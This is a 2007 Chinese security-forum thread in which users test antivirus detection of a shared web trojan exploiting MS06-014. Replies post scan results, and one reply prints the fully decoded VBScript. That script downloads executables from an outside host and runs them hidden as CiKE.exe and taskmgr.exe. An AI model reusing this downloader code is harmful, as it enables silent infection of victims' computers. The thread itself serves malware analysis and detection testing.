收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 过N款杀软的网马!你的杀软顶得住吗?
123下一页
返回列表 发新帖
查看: 4775|回复: 23
收起左侧

过N款杀软的网马!你的杀软顶得住吗?

[复制链接]
abin5288
发表于 2007-8-30 08:49:38 | 显示全部楼层 |阅读模式
已过诺顿,大蜘蛛!!!
忘记留解压密码了,不好意思,解压密码是mcafee

[ 本帖最后由 abin5288 于 2007-8-30 08:54 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

zxc3949
头像被屏蔽
发表于 2007-8-30 08:52:38 | 显示全部楼层
密码是好多啊?
回复

举报

yashoo
头像被屏蔽
发表于 2007-8-30 08:56:36 | 显示全部楼层
木马作者太蠢了,卡巴都没有免杀

已删除: 木马程序 Trojan-Downloader.VBS.Psyme.cr 文件: E:\test\ms06-014_code\ms06-014_code.htm

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

saga3721
发表于 2007-8-30 08:57:59 | 显示全部楼层
Virus or unwanted program 'TR/Dldr.Psyme.CR.3 [TR/Dldr.Psyme.CR.3]'
回复

举报

红心王子
发表于 2007-8-30 08:58:21 | 显示全部楼层


a-squared3.0.0.1232007.08.292007-08-29-
5.218
Arcavir1.0.42007082917402007-08-29-
1.145
AVAST1.0.8000769-22007-08-29HTML:Ascii-F [Expl]
3.047
AVG7.5.48.442269.12.10/9762007-08-27-
1.451
BitDefender7.60825.8151077.145542007-08-30Exploit.ADODB.Stream.EP
2.978
CA (VET)8.4.0.2431.1.50952007-08-30-
0.849
ClamAV 0.91.141072007-08-30Trojan.Downloader.VBS.Psyme-31
0.010
ewido4.0.0.22007.08.292007-08-29-
2.059
F-SECURE5.51.61002007.08.29.082007-08-29Trojan-Downloader.VBS.Psyme.cr
3.861
IKARUST3.1.1.122007.08.29.694162007-08-29Exploit.JS.ADODB.Stream
1.300
MKS_VIR2.012007.08.272007-08-27-
1.793
NOD322.70.824912007-08-30VBS/TrojanDownloader.Psyme.FD trojan
0.006
nProtect2007-08-28.00377742007-08-28Exploit.ADODB.Stream.EP
6.998
QuickHeal9.002007.08.282007-08-28-
2.200
SOPHOS2.49.14.212007-08-30Mal/Psyme-B
2.255
VBA323.12.2.320070828.07582007-08-28-
0.895
VirusBuster4.3.19:99.099.10/11.02007-08-30JS.Psyme.DE
0.943
冰岛杀毒3.16.162007.08.292007-08-29-
0.409
卡巴斯基5.5.102007.08.302007-08-30Trojan-Downloader.VBS.Psyme.cr
0.729
大蜘蛛4.332007.08.302007-08-30VBS.Psyme.239
4.813
小红伞7.4.1.666.39.1.612007-08-29TR/Dldr.Psyme.CR.3
2.280
江民杀毒10.00.6502007.08.282007-08-28-
0.774
熊猫卫士9.04.03.00012007.08.282007-08-28-
3.039
瑞星19.019.38.22.002007-08-29Trojan.DL.VBS.Agent.cgk
1.013
诺曼5.91.045.902007-08-29VBS/Psyme.AE
2.718
赛门铁克1.3.0.2420070829.0092007-08-29-
0.255
趋势8.500-10014.677.002007-08-28VBS_PSYME.GEN
0.041
迈克菲5.1.0051082007-08-29VBS/Psyme
0.643
金山毒霸2007.6.20.2492007.8.302007-08-30-
0.863
回复

举报

孤独更可靠
发表于 2007-8-30 09:04:17 | 显示全部楼层
Trojan.DL.VBS.Agent.cgk




第一个是明文``

下载setup.exe

第二个是US-ASCII

解后还有acsii加密

解后得:

"60script language="VBScript">    on error resume next
    Set adaWSAsjii__HSA = document.createElement("object")
    adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
    caogoogA1="Ado"
    caogoogA2="db."
    caogoogA3="Str"
    caogoogA4="eam"
    CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
    Cnisjii__WA=CnisjIoa__WA
    Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
    opaipPada.type = 1
    adagoogA.Open"GET","http://192.168.0.3/setup.exe",False
    adagoogA.Send
    Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
    Set temp = fso.GetSpecialFolder(2)
    filename=fso.BuildPath(temp,"CiKE.exe")
    opaipPada.open
    opaipPada.write adagoogA.responseBody
    opaipPada.savetofile filename,2
    opaipPada.close
    Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
    exc.ShellExecute filename,"","","open",0
    </script>
<script language="VBScript">    on error resume next
    Set adaWSAsjii__HSA = document.createElement("object")
    adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
    caogoogA1="Ado"
    caogoogA2="db."
    caogoogA3="Str"
    caogoogA4="eam"
    CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
    Cnisjii__WA=CnisjIoa__WA
    Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
    opaipPada.type = 1
    adagoogA.Open"GET","http://www.es86.com/pic/ddb/2006692151148920.gif",False
    adagoogA.Send
    Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
    Set temp = fso.GetSpecialFolder(2)
    filename=fso.BuildPath(temp,"taskmgr.exe")
    opaipPada.open
    opaipPada.write adagoogA.responseBody
    opaipPada.savetofile filename,2
    opaipPada.close
    Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
    exc.ShellExecute filename,"","","open",0
    </script>
<script type="text/jscript">
function init() {
document.write("f13E93?941?0?061?9?1?2?0]87        97?3");
}
window.onload = init;
</script>"

某某杀软报Trojan.DL.VBS.Agent.cgk


回复

举报

tracydk
发表于 2007-8-30 09:16:31 | 显示全部楼层
HTM....
回复

举报

tracydk
发表于 2007-8-30 09:16:51 | 显示全部楼层
红伞杀一个
回复

举报

woai_jolin
发表于 2007-8-30 09:17:11 | 显示全部楼层
2007-8-30 9:16:50        Real-time file system protection        file        F:\v\ms06-014_code.htm        VBS/TrojanDownloader.Psyme.FD trojan        cleaned by deleting - quarantined        NT AUTHORITY\SYSTEM        Event occurred on a new file created by the application: C:\PROGRA~1\WINZIP\winzip32.exe.
回复

举报

ssy275
发表于 2007-8-30 09:36:55 | 显示全部楼层
FS 报啊
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-3-1 13:45 , Processed in 0.085931 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表